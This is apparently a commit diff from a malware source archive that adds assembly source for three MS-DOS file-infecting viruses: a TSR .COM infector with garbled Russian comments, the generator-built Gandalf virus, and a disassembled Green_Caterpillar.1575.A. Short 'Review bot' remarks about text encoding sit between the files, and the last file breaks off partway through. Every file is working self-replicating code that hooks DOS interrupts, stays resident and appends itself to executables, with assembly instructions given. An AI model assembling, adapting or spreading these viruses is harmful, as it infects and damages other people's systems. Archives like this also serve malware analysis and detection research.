re-organize

push
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
@@ -0,0 +1,228 @@
;
; ¥ª®¬¥­¤ã¥âáï ®âª®¬¯¨«¨à®¢ âì, § ¯ãáâ¨âì ¨ ⮫쪮 ¯®â®¬ à áᬠâਢ âì
; source code. (‚ᥠࠢ­® ‚ ¬ ¢ ­¥¬ à §¡¨à âìáï ¯à¨¤¥âáï :-)).
;
; Œ¨«¥­ìª ï (¬ «¥­ìª ï) £ ¤®áâì, ¬¥à§®áâì, ¤àï­ì, ᪮⨭ ...
;
; ‚ ®¡é¥¬, ¢¨àãá, ª®â®àë© § à ¦ ¥â ¢á直¥ â ¬ ä ©«ë ¯à¨ ¯®¯ë⪥ ¨å
; § ¯ãáâ¨âì - ¯®ª  á ä ¬¨«¨¥© .COM, ¦¨¢¥â £¤¥-â® ­  ç¥à¤ ª¥ ¯®¤ ¢¥ªâ®à®¬
; 21-£® ¨­â¥àà ¯â , ­¥ áªà뢠¥â ᢮¥ ⥫® ¦¨à­®¥ ¢ ãâ¥á å, § à ¦¥­­ë¥
; ä ©«ë ®¯®§­ ¥â ¯® èãਪ¥­ã (â ª®© ⨯  §¢¥§¤®çª¨, ¨á¯®«ì§ã¥âáï ã
; ¢®áâ®ç­ëå ­ à®¤®¢ ¤«ï ®âᥪ ­¨ï £®«®¢ë ¨ ¥é¥ ª®¥-祣® ã ¡«¨¦­¥£®
; ᢮¥£®), à á¯®«®¦¥­­®¬ã ¢ 4-®¬ ¡ ©â¥ ®â ­ ç « ,   ᢮¥ ­ «¨ç¨¥ ¢
; ¯ ¬ï⨠¯à®¢¥àï¥â â ª: ª« ¤¥â ¢ AX á«®¢® BABA (¢ á¬ëá«¥, ­¥ â ª®¥
; á«®¢®,   word 0BABAh), ¢ë¯®«­ï¥â 21-¥ ¨­â¥à࠯⮢ ­¨¥ ¨ ᬮâà¨â,
; ¦¥« îâ «¨ íâã ¡ ¡ã 0FACCh. …᫨ ¦¥« îâ, â® á â çª®© ¢á¥ ¯®­ïâ­®.
;
; Copyright (c) 1992, Gogi&Givi International
;
.model tiny
.code
org 0100h
VirPar equ (endvir-StartVirus)/16+2 ; ‘ª®ª  ã ¢¨àãá  ¯ à £à ä®¢
VirLen equ (endvir-StartVirus) ;  §¬¥àë ¡îáâ  ¢¨àãá  ¢
; âà¥ã£®«ì­ëå ª¨«®¬¥âà å
gadost:
db 'è' ; …â® ª®¤ CALL
dw StartVirus-$-2 ; € ¥â® ᬥ饭¨¥ ­  StartVirus
db 15,09h ; ˜ãਪ¥­ ¨ ®áâ â®ª ®â mov ah,
int 21h ; € íâ® ¢á¥ ­®à¬ «ì­ë©
ret ; ª®¤ ¦¥àâ¢ë
GoodMessage db '’®¢ à¨é ‹®§¨­áª¨©! ”€Š ž!',13,10,'$'
;  ª®áâ­ë© ¬¥áá ¤¦ ¤«ï ¤ï¤¨
; ‹®§¨­áª®£®
StartVirus:
pop si ; â® ç⮡ë ã§­ âì, ªã¤  ­ á
call EntryPoint ; § ­¥á«®
EntryPoint:
pop si ; ‚믨孥¬  ¤à¥á ­ ç «  § à §ë
push ds ; ‘®åà ­¨¬ ¯ àã-âனªã ॣ¨áâ஢...
push es
push si
mov ax,cs ; ‚®ááâ ­®¢¨¬ ᯥàâë¥ ¡ ©âë
mov es,ax ; ¨§ § ¤­¨æë ä ©« 
mov ds,ax
mov di,0100h
add si,RobbedBytes-EntryPoint
mov cx,4
cld ; â® ¢®ááâ ­®¢«¥­¨¥
rep movsb
pop si
mov ax,0BABAh ; ஢¥à¨¬, å®âïâ «¨ ¡ ¡ã -
int 21h ; ¢ á¬ëá«¥, ¥áâì «¨ ¬ë
cmp ax,0FACCh ; ¢ ¯ ¬ïâ¨
jne NeedsBaba ; ‚¨¤ âì, å®âïâ ¥¥, த¨¬ãî!
jmp FucksNow ; …¥ 㦥 ®¡à ¡ â뢠îâ
NeedsBaba:
pop es
push es
mov ax,es ; Žâà뢠¥¬ ᥡ¥ á¥­â PSP
dec ax
mov es,ax ; ‘⮫쪮 ¢ ­ è¥© ¯ ª®áâ¨
mov ax,es:[3] ; ¯ à £à ä®¢
sub ax,virpar
mov es:[3],ax
mov bx,es:[1] ; «îá ®¤­  PSP
add bx,ax ; ‚ᥠᢠ«¨¢ ¥¬ ¢ ªãçã
mov es,bx
push ds ; ã, íâ® ¯®­ïâ­®
xor ax,ax
mov ds,ax
mov ax,ds:[21h*4] ; ‡ å¢ â뢠¥¬ áâ àë©
mov cs:[si+Off21-EntryPoint],ax ; ¢¥ªâ®à int 21h
mov ax,ds:[21h*4+2] ; ‚ á¬ëá«¥, ®­ ­¥ áâ àë©,
mov cs:[si+Seg21-EntryPoint],ax ; ®­ ¤ ¦¥ «ãçè¥ ­®¢®£®
pop ds
xor di,di ; ‡ á®¢ë¢ ¥¬ ¢ ­ ç «®
push si ; ­¨ç¥©­®£® ᥣ¬¥­â 
sub si,EntryPoint-StartVirus ; £¤¥-â® ­  § ¤¢®àª å
mov cx,VirLen ; ¯ ¬ï⨠­ è¥ £­ãá­®¥
rep movsb ; ⥫®
pop si
push ds ; ˆ áâ ¢¨¬ ­  㪠§ ­­®¥
xor ax,ax ; £­ãá­®¥ ⥫® ¢¥ªâ®à
mov ds,ax ; ¯à¥à뢠­¨ï 21h
mov word ptr ds:[21h*4],Int21Server-StartVirus
mov ds:[21h*4+2],es
pop ds
FucksNow:
pop es ; â® ¢ á«ãç ¥, ¥á«¨
pop ds ; ¯à¥¤«®¦¥­­®© ¦¥­é¨­®©
mov si,0100h ; (¢¨àãᮬ) 㦥 ®¡« ¤ îâ
push si
xor ax,ax ; ‚ᥠ¢®ááâ ­ ¢«¨¢ ¥¬ ª
xor bx,bx ; ï¤à¥­¥ ”¥­¥ - ¨ ¤®¬®©,
xor di,di ; ª ¬ ¬¥
ret
Int21Server:
pushf ; â® ­®¢ë© ®¡à ¡®â稪
push ax ; 21-£® ¨­â 
push bx
push ds
cmp ax,0BABAh ; ’ãâ ¬ë ãáâ ­®¢¨¬ ॠªæ¨î
jne NotTest ; ­  ¯à¥¤«®¦¥­¨¥ ¦¥­é¨­ë
pop ds ; (¨«¨ í४æ¨î)
pop bx
pop ax
popf
mov ax,0FACCh ; â® ­®à¬ «ì­ ï í४æ¨ï
iret ; (â® ¥áâì ॠªæ¨ï)
NotTest:
push cx ; ’ãâ ¬ë ª« áá­® ¨§¢à â¨¬áï,
mov cx,ax ; ç⮡ë ᤥ« âì ¢¨¤, çâ®
xchg cl,ch ; ­ ¬ ᮢᥬ ­¥ ­ã¦­®
xor cl,4Bh ; ®¡à ¡ â뢠âì äã­ªæ¨î EXEC
pop cx ; (—⮡ ‹®§¨­áª¨© £®«®¢ã «®¬ «
jz Exec ; ¨ ç⮡ ã ­¥£® ®çª¨ § ¯®â¥«¨)
jmp NotExec
Exec:
mov bx,dx ; ®ª« ¤¥¬ ᬥ饭¨¥ ¨¬¥­¨
; § ¯ã᪠¥¬®£® ä ©«  ¢ BX
SearchZero:
cmp byte ptr ds:[bx],0 ; ஢¥à¨¬ ­  §¥àã
je ZeroFound ; €å, ª®­¥æ ¨¬¥­¨!
inc bx
jmp SearchZero
ZeroFound:
sub bx,11 ; —㤥᭮!
push es ; ஢¥à¨¬, ¢¤à㣠ª ª®©-
mov ax,cs ; ­¨¡ã¤ì ¯á¨å ¦¥« ¥â
mov es,ax ; § à §¨âì COMMAND.COM
mov cx,11
mov di,offset CommandName-StartVirus
Compare:
mov al,ds:[bx] ; â® ¢á¥ á«®¦­ ï ¨ ­ã¤­ ï
cmp al,es:[di] ; ¯à®æ¥¤ãà  ¯à®¢¥àª¨...
jne NotCommand
inc bx
inc di
dec cx ; ‚ᥠ¯à®¢¥à塞, ¯à®¢¥à塞...
cmp cx,0
jne Compare
pop es
jmp Quit21Server ; —â® ¦ ï - ¤¥¡¨« COMMAND.COM
; § à ¦ âì?!
NotCommand:
pop es ; ’ ¬ ¬ë á®å࠭﫨 祣®©-â 
push ax
push bx ; ‘®åà ­¨¬ ¢á¥, çâ® ¯«®å®
push cx ; «¥¦¨â, çâ®¡ë ­¥ ¯à®¯ «®
push dx
mov ax,3D02h ; Žâªã¯®à¨¢ ¥¬ ª«¨¥­â  (ä ©«)
int 21h
jc EndExec ; 뢠îâ ¨ £­ãâë¥ ¯à®¡ª¨
mov bx,ax ; ®ª« ¤¥¬ ¯à®¡ªã ®â ä ©«  ¢ BX
mov cx,4 ; •®â¥«®áì ¡ë áç¨â âì 4 ¡ ©â 
mov ax,cs
mov ds,ax
mov ah,3Fh ; ‚ ¬¥áâ®, £¤¥ «¥¦ «¨
mov dx,offset RobbedBytes-StartVirus
int 21h ; ᯥàâë¥ ¡ ©âë
jc EndExec
cmp word ptr cs:[RobbedBytes-StartVirus],'ZM'
je CloseFile ;   䨣  EXE § à ¦ âì???
xor cx,cx
xor dx,dx
mov ax,4202h
int 21h ; ‹¥§¥¬ ¢ § ¤­¨æã ä ©« 
cmp ax,1000 ;   䨣  ­ ¬ ä ©«ë ¬¥­ìè¥
jl CloseFile ; 1 ª¨«®?
cmp ax,64000 ; € ⥬ ¡®«¥¥ ¡®«ìè¥ 64
ja CloseFile
sub ax,3
mov cs:[FileSize-StartVirus],ax ; ˜ãਪ¥­  ?
cmp byte ptr cs:[RobbedBytes-StartVirus+3],15
je CloseFile ; ˆª¥¡ ­ !
mov ax,cs
mov ds,ax
mov ah,40h ; ƒ«ã¯ë© ¢¨àãá ஡ª® ¯àïç¥â
xor dx,dx ; ⥫® ¦¨à­®¥ ¢ § ¤­¨æ¥ ä ©« 
mov cx,VirLen
int 21h
xor cx,cx ; ˆ ¢ ­ ç «® ã¡¥£ ¥â, ç⮡ë
xor dx,dx ; JUMP â㤠 ¯®áâ ¢¨âì
mov ax,4200h
int 21h
mov ah,40h
mov dx,offset SuperByte-StartVirus ; ” ©« ­  â® ¨ ä ©«, ç⮡ë
mov cx,4 ; ¢ë§ë¢ âì ¯®¤ª«¥¥­­ë©
int 21h ; á§ ¤¨ ¢¨àãá
CloseFile:
mov ah,3Eh ; ‘¨¥ § ªàë⨥ ä ©«  - ­ ¬
int 21h ; ®­ ¡®«ìè¥ ¢  é¥ ­¥ ­ã¦¥­
EndExec:
pop dx ; Œë â ¬, ª ¦¨áì, á®å࠭﫨
pop cx ; ®¯ïâì 祣®©-â ?
pop bx
pop ax
jmp Quit21Server ; ˆ ¯® ¡ ¡ ¬!
NotExec:
;   á«ãç © á«¥¤ãîé¨å 堬᪨å à §à ¡®â®ª
Quit21Server:
pop ds ; —¥¬ ¦¥ ¬ë ⮫쪮
pop bx ; STACK' ­ ­¥ ­ ¯®«­ï«¨?!
pop ax
popf ; …é¥ ¨ ä« £ ¬¨?!!!
db 0EAh
Off21 dw 0000h ; ’ ª ¡ã¤¥â á ª ¦¤ë¬, ªâ®...
Seg21 dw 0000h
RobbedBytes:
mov dx,offset GoodMessage ; â® ¢à®¤¥ ª ª ᯥàâë¥ ¡ ©âë
db 0B4h
SuperByte db 'è' ; € íâ® ­¥ ᯥàâë¥, ­®
FileSize dw 0000h ; ⮦¥ å®à®è¨¥
db 15 ; ˜ãਪ¥­ 
db '=>' ; â® ¤«ï ªà á®âë
CommandName db 'COMMAND.COM<=' ; € íâ® ®â COMMAND.COM
endvir:
end gadost ; ˆ ¢á¥!
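Review bot: Every comment in this file, and the string literal at `GoodMessage` on L42, appears to be CP866 Cyrillic displayed through a Western code page, so none of the explanatory comments (the header block on L13–L26 and the end-of-line notes throughout) is readable as stored. A one-line header such as `; Comments and strings: Russian, CP866 — re-decode before reading` would let a reader recover them without guessing. The string literal shares the problem but is program data, so it should be kept byte-for-byte rather than re-encoded; the `db 'è'` bytes on L37 and L223 likewise stand for a raw byte value (an opcode, per the comment on L37) and must not be normalized.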
@@ -0,0 +1,202 @@
; Virus generated by Gý 0.70á
; Gý written by Dark Angel of Phalcon/Skism
; File: GANDALF.ASM
; Gandalf by Ender
.model tiny
.code
; Assemble with:
; TASM /m3 filename.ASM
; TLINK /t filename.OBJ
org 0100h
carrier:
db 0E9h,0,0 ; jmp start
start:
call next
next:
pop bp
sub bp, offset next
mov ah, 0047h ; Get directory
lea si, [bp+offset origdir+1]
cwd ; Default drive
int 0021h
lea dx, [bp+offset newDTA]
mov ah, 001Ah ; Set DTA
int 0021h
mov ax, 3524h
int 0021h
push es
push bx
lea dx, [bp+INT24] ; ASSumes ds=cs
mov ax, 2524h
int 0021h
push cs
pop es
restore_COM:
mov di, 0100h
push di
lea si, [bp+offset old3]
movsb
movsw
mov byte ptr [bp+numinfect], 0000h
traverse_loop:
lea dx, [bp+offset COMmask]
call infect
cmp [bp+numinfect], 0007h
jae exit_traverse ; exit if enough infected
mov ah, 003Bh ; CHDIR
lea dx, [bp+offset dot_dot] ; go to previous dir
int 0021h
jnc traverse_loop ; loop if no error
exit_traverse:
lea si, [bp+offset origdir]
mov byte ptr [si], '\'
mov ah, 003Bh ; restore directory
xchg dx, si
int 0021h
pop dx
pop ds
mov ax, 2524h
int 0021h
mov dx, 0080h ; in the PSP
mov ah, 001Ah ; restore DTA to default
int 0021h
return:
ret
old3 db 0cdh,20h,0
INT24:
mov al, 0003h
iret
infect:
mov cx, 0007h ; all files
mov ah, 004Eh ; find first
findfirstnext:
int 0021h
jc return
mov ax, 4300h
lea dx, [bp+newDTA+30]
int 0021h
jc return
push cx
push dx
mov ax, 4301h ; clear file attributes
push ax ; save for later use
xor cx, cx
int 0021h
mov ax, 3D02h
lea dx, [bp+newDTA+30]
int 0021h
mov bx, ax ; xchg ax,bx is more efficient
mov ax, 5700h ; get file time/date
int 0021h
push cx
push dx
mov ah, 003Fh
mov cx, 001Ah
lea dx, [bp+offset readbuffer]
int 0021h
mov ax, 4202h
xor cx, cx
cwd
int 0021h
cmp word ptr [bp+offset readbuffer], 'ZM'
jz jmp_close
mov cx, word ptr [bp+offset readbuffer+1] ; jmp location
add cx, heap-start+3 ; convert to filesize
cmp ax, cx ; equal if already infected
jl skipp
jmp_close:
jmp close
skipp:
cmp ax, 65535-(endheap-start) ; check if too large
ja jmp_close ; Exit if so
cmp ax, (heap-start) ; check if too small
jb jmp_close ; Exit if so
lea si, [bp+offset readbuffer]
lea di, [bp+offset old3]
movsb
movsw
sub ax, 0003h
mov word ptr [bp+offset readbuffer+1], ax
mov dl, 00E9h
mov byte ptr [bp+offset readbuffer], dl
lea dx, [bp+offset start]
mov ah, 0040h ; concatenate virus
mov cx, heap-start
int 0021h
xor cx, cx
mov ax, 4200h
xor dx, dx
int 0021h
mov cx, 0003h
lea dx, [bp+offset readbuffer]
mov ah, 0040h
int 0021h
inc [bp+numinfect]
close:
mov ax, 5701h ; restore file time/date
pop dx
pop cx
int 0021h
mov ah, 003Eh
int 0021h
pop ax ; restore file attributes
pop dx ; get filename and
pop cx ; attributes from stack
int 0021h
mov ah, 004Fh ; find next
jmp findfirstnext
signature db '[PS/Gý]',0 ; Phalcon/Skism Gý
creator db 'Ender',0
virusname db 'Gandalf',0
COMmask db '*.COM',0
dot_dot db '..',0
heap:
newDTA db 43 dup (?)
origdir db 65 dup (?)
numinfect db ?
readbuffer db 1ah dup (?)
endheap:
end carrier
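Review bot: The generator name on L231–L232 and the `signature` string on L378 contain `ý`, which looks like a single non-ASCII byte mis-rendered through a different code page rather than the author's glyph. Since `signature` is the byte sequence an analyst would use to identify this family in an infected file, the source should record the intended byte, e.g. `; byte after 'G' in signature is <ORIGINAL BYTE — placeholder, verify against a pristine copy>`, so detection patterns derived from this archived copy are not built on a transcription error. The comment `ASSumes ds=cs` on L259 documents a real precondition of the `int 2524h` call and is worth keeping as-is.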
@@ -0,0 +1,929 @@
; Green_Caterpillar.1575.A
; TASM /M
seg000 segment byte public 'CODE'
assume cs:seg000
org 100h
assume es:nothing, ss:nothing, ds:seg000
start proc near
jmp short RealStart
db 90h
Int21Ofs dw 0
Int21Seg dw 0
Int1COfs dw 0
Int1CSeg dw 0
exeHeader dw 20CDh
exeMOD dw 9090h
exeDIV dw 0
exeNumSeg dw 0
exeHeadSize dw 0
exeMinPara dw 0
exeMaxPara dw 0
exeSS dw 0
exeSP dw 0
exeCheckSum dw 0
exeIP dw 0
exeCS dw 0
StartCS dw 0
StartIP dw 0
FileSizeHW dw 0
FileSizeLW dw 0
StoreSS dw 0
DTAOffset dw 0
DTASegment dw 0
StartSS dw 0
StoreBP dw 0
StoreES dw 0
Int24Seg dw 0
Int24Ofs dw 0
GenCounter db 16
byte_0_13C db 7, 57h, 75h, 2, 5Ch, 7, 70h, 0, 16h, 0, 0BFh, 0Bh, 5Ch, 7, 70h, 0
RealStart:
push es
push ds
mov ax, es
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
assume es:seg000
mov StoreES, ax
mov ax, ss
mov StoreSS, ax
mov al, 2
out 20h, al ; Interrupt controller, 8259A.
cld
xor ax, ax
mov ds, ax ; DS points to IVT
assume ds:nothing
xor si, si
mov di, 13Ch
mov cx, 16
repne movsb
push ds
pop ss ; SS = DS
assume ss:nothing
mov bp, 8
xchg bp, sp
call near ptr sub_0_1C5
jmp StoreFilename
start endp
FixupInts:
call GetInt24Vecs
call CheckInfection
jz AlreadyInf ; Infected Already? Then JMP.
mov al, ds:FileType
push ax
call InfectCOM
pop ax
mov ds:FileType, al
jmp short RestoreFile
nop
AlreadyInf:
call GetIntVectors
call CheckForInstall
cmp ds:FileType, 0 ; No File Type?
jnz RestoreFile ; No? Then JMP.
mov ax, 4C00h
int 21h ; Exit To DOS
RestoreFile: ; COM File?
cmp ds:FileType, 'C'
jnz RestoreEXE ; No? Then JMP.
RestoreCOM:
pop ds
assume ds:seg000
pop es
assume es:nothing
push cs
pop ds ; DS = CS
pop es
push es
mov di, offset start
mov si, offset exeHeader
mov cx, 12
repne movsb ; Restore Original 12 Bytes
push es
pop ds ; DS = ES
mov ax, offset start
push ax
xor ax, ax
retf ; Return to Original COM Program
sub_0_1C5 proc far
mov si, 6
lodsw
cmp ax, 192h
jz RestoreCOM
cmp ax, 179h
jnz loc_0_1D6
jmp loc_0_27F
loc_0_1D6:
cmp ax, 1DCh
jz RestoreEXE
retn
RestoreEXE:
pop ds
pop es
mov bx, cs:exeSS
sub bx, cs:StartSS
mov ax, cs
sub ax, bx
mov ss, ax
assume ss:nothing
mov bp, cs:StoreBP
xchg bp, sp
mov bx, cs:exeCS
sub bx, cs:StartCS
mov ax, cs
sub ax, bx
push ax
mov ax, cs:StartIP
push ax
retf
sub_0_1C5 endp
Caterpillar db '#'
db 1Ah
db '<'
db '#'
db '/'
db '-'
db '-'
db '!'
db '.'
db '$'
db 0Eh
db '#'
db '/'
db '-'
db 'à'
FileName db 'A:10KBYTE.EXE',0
db 0 ;
db 24h ; $
db 24h ; $
db 24h ; $
db 24h ; $
db 24h ; $
CheckInfection proc near
mov ax, 3D02h
mov dx, offset FileName
int 21h ; Open File
jnb CheckOpened ; No problems? Then JMP.
clc
retn
CheckOpened:
mov StoreSS, ax
mov dx, offset NewInt24
mov ax, 2524h
int 21h ; Set New Int 24h Vectors
mov ax, 4202h
mov bx, StoreSS
mov cx, 0FFFFh
mov dx, 0FFFEh
int 21h ; Move Pointer to End of File - 1
mov dx, offset CheckBytes
mov ah, 3Fh
mov bx, StoreSS
mov cx, 2
int 21h ; Read In 2 Bytes
mov ah, 3Eh
int 21h ; Close File
push ds
mov dx, Int24Ofs
mov ax, Int24Seg
mov ds, ax
mov ax, 2524h
int 21h ; Restore Int 24h Vectors
pop ds
cmp CheckBytes, 0A0Ch ; Infected Already?
clc
retn
CheckInfection endp
CheckBytes dw 0
loc_0_27F:
cmp ax, 22Dh
jz InfectCOM
push ds
pop es ; ES = DS
assume es:seg000
push cs
pop ds ; DS = CS
mov ax, StoreSS
mov ss, ax ; SS = SS
assume ss:nothing
xchg bp, sp
mov si, offset byte_0_13C
mov di, 0
mov cx, 16
cld
repne movsb
jmp FixupInts
InfectCOM proc near
mov al, 'C'
mov FileType, al
mov al, 8
out 70h, al ; CMOS Memory:
; used by real-time clock
in al, 71h ; CMOS Memory
mov GenCounter, al
mov dx, offset FileName
mov ax, 3D02h
int 21h ; Open File
jnb COMOpened ; No problems? Then JMP.
retn
COMOpened: ; Store Handle
mov StoreSS, ax
mov dx, offset exeHeader
mov bx, StoreSS
mov cx, 12
mov ah, 3Fh
int 21h ; Read In 12 Bytes From File
mov ax, 4202h
xor cx, cx
xor dx, dx
int 21h ; Move Pointer to End of File
push ax
add ax, 10h
and ax, 0FFF0h
push ax
shr ax, 1
shr ax, 1
shr ax, 1
shr ax, 1 ; Fix For Segment Size
mov di, offset VirusFixedSeg
stosw ; Store Segment Value
pop ax
pop bx
sub ax, bx
mov cx, 1575
add cx, ax
mov dx, offset start
sub dx, ax
mov bx, StoreSS
mov ah, 40h
int 21h ; Write Virus to File
mov ax, 4200h
xor cx, cx
xor dx, dx
int 21h ; Move Pointer to Beginning of File
mov ah, 40h
mov bx, StoreSS
mov cx, 12
mov dx, offset COMHeader
int 21h ; Write COM Header to File
mov ah, 3Eh
mov bx, StoreSS
int 21h ; Close File
retn
InfectCOM endp
COMHeader:
push cs
mov ax, cs
PUSHOffset db 5
VirusFixedSeg dw 0 ; PUSH Fixed Segment
push ax
mov ax, offset start
push ax
retf
InfectEXE proc near
mov al, 'E'
mov FileType, al
mov al, 8
out 70h, al ; CMOS Memory:
; used by real-time clock
in al, 71h ; CMOS Memory
mov GenCounter, al
mov dx, offset FileName
mov ax, 3D02h
int 21h ; Open EXE File
jnb EXEOpened ; No problems? Then JMP.
retn
EXEOpened:
mov StoreSS, ax
mov dx, offset exeHeader
mov bx, StoreSS
mov cx, 24
mov ah, 3Fh
int 21h ; Read In 24 Bytes
mov ax, 4202h
mov cx, 0
mov dx, 0
int 21h ; Move pointer to End of File
push ax
add ax, 10h
adc dx, 0
and ax, 0FFF0h
mov FileSizeHW, dx
mov FileSizeLW, ax
mov cx, 1831
sub cx, 100h
add ax, cx
adc dx, 0
mov cx, 512
div cx
inc ax
mov exeDIV, ax
mov exeMOD, dx
mov ax, exeCS
mov StartCS, ax
mov ax, exeIP
mov StartIP, ax
mov ax, exeSS
mov StartSS, ax
mov ax, exeSP
mov StoreBP, ax
mov dx, FileSizeHW
mov ax, FileSizeLW
mov cx, 10h
div cx
sub ax, 10h
sub ax, exeHeadSize
mov exeCS, ax
mov exeSS, ax
mov exeIP, 100h
mov exeSP, 100h
mov ax, 4200h
xor cx, cx
mov dx, 2
int 21h ; Move Pointer to Beginning + 2
mov dx, offset exeMOD
mov bx, StoreSS
mov cx, 22
mov ah, 40h
int 21h ; Write New EXE Header
mov ax, 4202h
xor cx, cx
xor dx, dx
int 21h ; Move Pointer to End Of File
mov dx, 100h
mov ax, FileSizeLW
pop cx
sub ax, cx
sub dx, ax
mov cx, 1831
add cx, ax
sub cx, 100h
mov ah, 40h
int 21h ; Write Virus To File
mov ah, 3Eh
int 21h ; Close File
retn
InfectEXE endp
FindFirstFile:
push cx
mov cx, 0
mov ah, 4Eh
int 21h ; Find First File
pop cx
retn
GetIntVectors proc near
push es
mov ax, 351Ch
int 21h ; Get Int 1Ch Vectors
mov cs:Int1COfs, bx
mov cs:Int1CSeg, es
mov ax, 3521h
int 21h ; Get Int 21h Vectors
push es
pop ax
mov cs:Int21Seg, ax
mov cs:Int21Ofs, bx
pop es
assume es:nothing
retn
GetIntVectors endp
CheckForInstall proc near
push ax
push es
push ds
xor ax, ax
mov es, ax ; ES points to IVT
assume es:nothing
mov si, 86h
mov ax, es:[si] ; Get Int 21h Segment
mov ds, ax
mov si, offset InfMarker
cmp word ptr [si], 0A0Ch ; In Memory Already?
jnz InstallVirus ; No? Then JMP.
push ds
pop ax
call sub_0_601
pop ds
pop es
assume es:nothing
pop ax
retn
InstallVirus:
push cs
pop ds
mov ax, StoreES
dec ax
mov es, ax ; ES points to MCB
cmp byte ptr es:0, 'Z' ; Last MCB?
jz GotLastMCB ; Yes? Then JMP.
jmp short NotLastMCB
nop
GotLastMCB: ; Get Amount of Memory in MCB
mov ax, es:3
CheckForInstall endp
mov cx, 1847
shr cx, 1
shr cx, 1
shr cx, 1
shr cx, 1 ; Calculate Paragraphs
sub ax, cx ; Subtract 1847 Bytes
jb NotLastMCB ; Enough Memory? No? Then JMP.
mov es:3, ax ; Set New Amount of Memory in MCB
sub es:12h, cx ; Set Next Segment Value
push cs
pop ds ; DS = CS
mov ax, es:12h
push ax
pop es ; ES points to Virus Segment
mov si, offset start
push si
pop di
mov cx, 1575
cld
repne movsb ; Copy Virus Into Memory
push es
sub ax, ax
mov es, ax ; ES points to IVT
assume es:nothing
mov si, 84h
mov dx, offset NewInt21
mov es:[si], dx ; Set New Int 21h Offset
inc si
inc si
pop ax
mov es:[si], ax ; Set New Int 21h Segment
NotLastMCB:
pop ds
pop es
assume es:nothing
pop ax
retn
NewInt21: ; Virus Calling?
cmp al, 57h
jnz CheckForDTACall ; No? Then JMP.
jmp short JMPInt21
nop
CheckForDTACall: ; Set New DTA Segment/Offset
cmp ah, 1Ah
jnz CheckFindFCB ; No? Then JMP.
call StoreDTAVecs
jmp short JMPInt21
nop
CheckFindFCB: ; Find First File (FCB)?
cmp ah, 11h
jnz CheckFindNextMC ; No? Then JMP.
call FindFirstFCB
iret
CheckFindNextMC: ; Find Next File (FCB)?
cmp ah, 12h
jnz JMPInt21 ; No? Then JMP.
call FindNextFCB
iret
JMPInt21:
jmp dword ptr cs:Int21Ofs
FindFirstFCB proc near
mov al, 57h ; Virus Calling
int 21h ; Find First File (FCB)
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
assume es:seg000
mov cs:InfectCount, 0
nop
call GetFilename
jnz GotBadFile
call CheckInfection
jz GotBadFile
call DoInfection
dec InfectCount
GotBadFile:
pop es
assume es:nothing
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
FindFirstFCB endp
GetFilename proc near
push cs
pop es ; ES = CS
assume es:seg000
push cs
pop es ; ES = CS
cld
call StoreFilename
jnb CheckExt ; No problems? Then JMP.
cmp di, 0
retn
CheckExt:
mov di, offset FileName
mov al, '.'
mov cx, 11
repne scasb ; Scan for File Extension
cmp word ptr [di], 'OC' ; COM File?
jnz CheckForEXE ; No? Then JMP.
cmp byte ptr [di+2], 'M' ; COM File?
jnz CheckForEXE ; No? Then JMP.
mov FileType, 'C'
nop
retn
CheckForEXE: ; EXE File?
cmp word ptr [di], 'XE'
jnz BadFileType ; No? Then JMP.
cmp byte ptr [di+2], 'E' ; EXE File?
jnz BadFileType ; NO? Then JMP.
mov FileType, 'E'
nop
BadFileType:
retn
GetFilename endp
StoreFilename proc near
push ds
mov si, cs:DTAOffset
mov ax, cs:DTASegment
mov ds, ax
mov di, offset FileName
lodsb
cmp al, 0FFh ; Extended FCB?
jnz RegularFCB ; No? Then JMP.
add si, 6 ; Add For Extended FCB
lodsb ; Get First Character
jmp short FileOnDrive
nop
RegularFCB: ; Is this a file on a drive?
cmp al, 5
jb FileOnDrive ; Yes? Then JMP.
pop ds
stc
retn
FileOnDrive:
mov cx, 11
cmp al, 0 ; End of Filename?
jz EndOfName ; Yes? Then JMP.
add al, 40h ; Capitalize Drive Letter
stosb ; Store Drive Letter
mov al, ':'
stosb
EndOfName:
lodsb
cmp al, 20h ; End of Filename?
jz EndOFFilename ; Yes? Then JMP.
stosb ; Store Character
jmp short GetNextChar
nop
EndOFFilename:
cmp byte ptr es:[di-1], '.'
jz GetNextChar
mov al, '.'
stosb ; Store EXTENSION Marker
GetNextChar:
loop EndOfName
mov al, 0
stosb ; Store End of Filename
pop ds
clc
retn
StoreFilename endp
FindNextFCB proc near
mov al, 57h ; Virus Call
int 21h ; Find Next File (FCB)
push ax
push cx
push dx
push bx
push bp
push si
push di
push ds
push es
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
cmp cs:InfectCount, 0 ; Infected one yet?
jz CheckFile ; No? Then JMP.
jmp short BadFile
nop
CheckFile:
call GetFilename
jnz BadFile ; Bad? Then JMP.
call CheckInfection
jz BadFile ; Infected Already? Then JMP.
call DoInfection
dec InfectCount
pop es
assume es:nothing
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
BadFile:
pop es
pop ds
pop di
pop si
pop bp
pop bx
pop dx
pop cx
pop ax
retn
FindNextFCB endp
InfectCount db 0
StoreDTAVecs proc near
push ax
push ds
pop ax
mov cs:DTASegment, ax
mov cs:DTAOffset, dx
pop ax
retn
StoreDTAVecs endp
GetInt24Vecs proc near
push cs
mov al, 0
out 20h, al ; Interrupt controller, 8259A.
mov ax, 3524h
int 21h ; Get Int 24h Vectors
mov Int24Ofs, bx
mov bx, es
mov Int24Seg, bx
pop es
mov si, offset Caterpillar
mov di, offset FileName
mov cx, 15
loc_0_5FA:
lodsb
add al, 20h
stosb
loop loc_0_5FA
retn
GetInt24Vecs endp
sub_0_601 proc near
push ax
push cs
pop ds ; DS = CS
push cs
pop es ; ES = CS
assume es:seg000
mov bl, GenCounter
cmp bl, 0Ch
ja loc_0_648
cmp bl, 0
jz loc_0_648
mov al, 8
out 70h, al ; CMOS Memory:
; used by real-time clock
in al, 71h ; CMOS Memory
cmp al, 0Ch
ja loc_0_648
cmp al, 0
jz loc_0_648
cmp al, bl
jz loc_0_648
inc bl
call CheckCounter
cmp al, bl
jz loc_0_648
inc bl
call CheckCounter
cmp al, bl
jz loc_0_648
pop ds
call FillWithSpace
push cs
pop ds ; DS = CS
retn
sub_0_601 endp
CheckCounter proc near
cmp bl, 12 ; Counter Below or Equal to 12?
